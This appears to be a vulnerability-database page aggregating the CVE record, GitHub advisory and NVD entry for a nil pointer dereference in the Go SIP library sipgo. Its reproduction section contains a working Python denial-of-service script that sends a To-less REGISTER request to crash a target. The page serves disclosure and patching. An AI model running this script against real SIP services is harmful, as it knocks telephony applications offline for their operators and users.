CVE-2025-68274 (GCVE-0-2025-68274)

Vulnerability from cvelistv5 – Published: 2025-12-16 22:02 – Updated: 2025-12-17 21:15

Summary

SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-476 - NULL Pointer Dereference
CWE-755 - Improper Handling of Exceptional Conditions

Assigner

GitHub_M

References

URL

Tags

	https://github.com/emiago/sipgo/security/advisori…	x_refsource_CONFIRM
	https://github.com/emiago/sipgo/commit/dc9669364a…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	emiago	sipgo	Affected: >= v0.3.0, < v1.0.0-alpha-1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68274",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-17T21:14:54.467011Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-17T21:15:10.262Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "sipgo",
          "vendor": "emiago",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= v0.3.0, \u003c v1.0.0-alpha-1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "CWE-476: NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-755",
              "description": "CWE-755: Improper Handling of Exceptional Conditions",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-16T22:02:55.360Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv"
        },
        {
          "name": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8"
        }
      ],
      "source": {
        "advisory": "GHSA-c623-f998-8hhv",
        "discovery": "UNKNOWN"
      },
      "title": "SIPGO library has response DoS vulnerability via nil pointer dereference"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68274",
    "datePublished": "2025-12-16T22:02:55.360Z",
    "dateReserved": "2025-12-16T14:05:31.364Z",
    "dateUpdated": "2025-12-17T21:15:10.262Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68274\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-16T22:15:50.830\",\"lastModified\":\"2025-12-16T22:15:50.830\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-476\"},{\"lang\":\"en\",\"value\":\"CWE-755\"}]}],\"references\":[{\"url\":\"https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"SIPGO library has response DoS vulnerability via nil pointer dereference\", \"source\": {\"advisory\": \"GHSA-c623-f998-8hhv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"emiago\", \"product\": \"sipgo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= v0.3.0, \u003c v1.0.0-alpha-1\"}]}], \"references\": [{\"url\": \"https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv\", \"name\": \"https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8\", \"name\": \"https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-476\", \"description\": \"CWE-476: NULL Pointer Dereference\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-755\", \"description\": \"CWE-755: Improper Handling of Exceptional Conditions\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-16T22:02:55.360Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68274\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-17T21:14:54.467011Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2025-12-17T21:15:03.461Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68274\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-16T22:02:55.360Z\", \"dateReserved\": \"2025-12-16T14:05:31.364Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-16T22:02:55.360Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-C623-F998-8HHV

Vulnerability from github – Published: 2025-12-16 21:24 – Updated: 2025-12-16 21:24

Summary

SIPGO is Vulnerable to Response DoS via Nil Pointer Dereference

Details

Description

A nil pointer dereference vulnerability was discovered in the SIPGO library's NewResponseFromRequest function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.

The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.

Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the NewResponseFromRequest function.

Technical details

The vulnerability is located in /sip/response.go at line 242 in the NewResponseFromRequest function:

if _, ok := res.To().Params["tag"]; !ok {
    uuid, _ := uuid.NewRandom()
    res.to.Params["tag"] = uuid.String()
}

Root Cause:

Missing To Header: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.
Header Copying Logic: During response creation in NewResponseFromRequest, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response.
Unsafe Assumption: The response creation code assumes the To header exists and calls res.To().Params["tag"] without checking if res.To() returns nil, causing a nil pointer dereference.

Stack Trace:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]

goroutine 175 [running]:
github.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})
    /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394

Impact

This vulnerability affects all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses.

Attack Impact: - Availability: Complete denial of service - application crashes immediately - Remote Exploitation: Yes - Authentication Required: No - vulnerability triggers during initial response generation which does not require authentication

How to reproduce the issue

To reproduce this issue, you need:

A SIP application using the vulnerable sipgo library
Network access to send SIP messages to the target

Steps:

Save the following Python script as sipgo-response-dos.py:

```python

!/usr/bin/env python3

import socket import sys import time import random

def create_malformed_register(target_ip, target_port): call_id = f"sipgo-dos-{int(time.time())}" tag = f"sipgo-dos-{random.randint(1000, 9999)}" branch = f"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}"

# Craft malformed SIP request without To header
sip_message = (
    f"REGISTER sip:{target_ip}:{target_port} SIP/2.0\r\n"
    f"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\r\n"
    f"From: <sip:attacker@192.168.1.100>;tag={tag}\r\n"
    f"Call-ID: {call_id}\r\n"
    f"CSeq: 1 REGISTER\r\n"
    f"Contact: <sip:attacker@192.168.1.100:5060>\r\n"
    f"Content-Length: 0\r\n"
    f"\r\n"
)
return sip_message

if name == "main": if len(sys.argv) != 3: print("Usage: python3 sipgo-response-dos.py ") sys.exit(1)

target_ip = sys.argv[1]
target_port = int(sys.argv[2])

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload = create_malformed_register(target_ip, target_port)

print(f"Sending malformed REGISTER to {target_ip}:{target_port}")
sock.sendto(payload.encode('utf-8'), (target_ip, target_port))
print("Exploit sent - target should crash immediately")

```

Run the script against a vulnerable sipgo application:

bash python3 sipgo-response-dos.py <target_ip> <target_port>
Observe that the target application crashes with a SIGSEGV panic.

Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/emiago/sipgo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.3.0"
            },
            {
              "fixed": "1.0.0-alpha-1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-16T21:24:16Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Description\n\nA nil pointer dereference vulnerability was discovered in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.\n\nThe vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.\n\n\u003e Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function.\n\n### Technical details\n\nThe vulnerability is located in `/sip/response.go` at line 242 in the `NewResponseFromRequest` function:\n\n```go\nif _, ok := res.To().Params[\"tag\"]; !ok {\n    uuid, _ := uuid.NewRandom()\n    res.to.Params[\"tag\"] = uuid.String()\n}\n```\n\n**Root Cause:**\n\n1. **Missing To Header**: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.\n\n2. **Header Copying Logic**: During response creation in `NewResponseFromRequest`, the code attempts to copy headers from the request to the response. Since there\u0027s no To header in the request, no To header is copied to the response.\n\n3. **Unsafe Assumption**: The response creation code assumes the To header exists and calls `res.To().Params[\"tag\"]` without checking if `res.To()` returns `nil`, causing a nil pointer dereference.\n\n**Stack Trace:**\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]\n\ngoroutine 175 [running]:\ngithub.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})\n    /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394\n```\n\n### Impact\n\nThis vulnerability affects **all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses**.\n\n**Attack Impact:**\n- **Availability**: Complete denial of service - application crashes immediately\n- **Remote Exploitation**: Yes\n- **Authentication Required**: No - vulnerability triggers during initial response generation which does not require authentication\n\n\n### How to reproduce the issue\n\nTo reproduce this issue, you need:\n\n1. A SIP application using the vulnerable sipgo library\n2. Network access to send SIP messages to the target\n\nSteps:\n\n1. Save the following Python script as `sipgo-response-dos.py`:\n\n    ```python\n    #!/usr/bin/env python3\n    import socket\n    import sys\n    import time\n    import random\n\n    def create_malformed_register(target_ip, target_port):\n        call_id = f\"sipgo-dos-{int(time.time())}\"\n        tag = f\"sipgo-dos-{random.randint(1000, 9999)}\"\n        branch = f\"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}\"\n        \n        # Craft malformed SIP request without To header\n        sip_message = (\n            f\"REGISTER sip:{target_ip}:{target_port} SIP/2.0\\r\\n\"\n            f\"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\\r\\n\"\n            f\"From: \u003csip:attacker@192.168.1.100\u003e;tag={tag}\\r\\n\"\n            f\"Call-ID: {call_id}\\r\\n\"\n            f\"CSeq: 1 REGISTER\\r\\n\"\n            f\"Contact: \u003csip:attacker@192.168.1.100:5060\u003e\\r\\n\"\n            f\"Content-Length: 0\\r\\n\"\n            f\"\\r\\n\"\n        )\n        return sip_message\n\n    if __name__ == \"__main__\":\n        if len(sys.argv) != 3:\n            print(\"Usage: python3 sipgo-response-dos.py \u003ctarget_ip\u003e \u003ctarget_port\u003e\")\n            sys.exit(1)\n        \n        target_ip = sys.argv[1]\n        target_port = int(sys.argv[2])\n        \n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        payload = create_malformed_register(target_ip, target_port)\n        \n        print(f\"Sending malformed REGISTER to {target_ip}:{target_port}\")\n        sock.sendto(payload.encode(\u0027utf-8\u0027), (target_ip, target_port))\n        print(\"Exploit sent - target should crash immediately\")\n    ```\n\n\n2. Run the script against a vulnerable sipgo application:\n\n    ```bash\n    python3 sipgo-response-dos.py \u003ctarget_ip\u003e \u003ctarget_port\u003e\n    ```\n\n3. Observe that the target application crashes with a SIGSEGV panic.\n\n\u003e Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.",
  "id": "GHSA-c623-f998-8hhv",
  "modified": "2025-12-16T21:24:16Z",
  "published": "2025-12-16T21:24:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv"
    },
    {
      "type": "WEB",
      "url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/emiago/sipgo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SIPGO is Vulnerable to Response DoS via Nil Pointer Dereference"
}

FKIE_CVE-2025-68274

Vulnerability from fkie_nvd - Published: 2025-12-16 22:15 - Updated: 2025-12-16 22:15

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8
	security-advisories@github.com	https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue."
    }
  ],
  "id": "CVE-2025-68274",
  "lastModified": "2025-12-16T22:15:50.830",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-16T22:15:50.830",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        },
        {
          "lang": "en",
          "value": "CWE-755"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-68274 (GCVE-0-2025-68274)

GHSA-C623-F998-8HHV

Description

Technical details

Impact

How to reproduce the issue

!/usr/bin/env python3

FKIE_CVE-2025-68274

Tags

Sightings

Nomenclature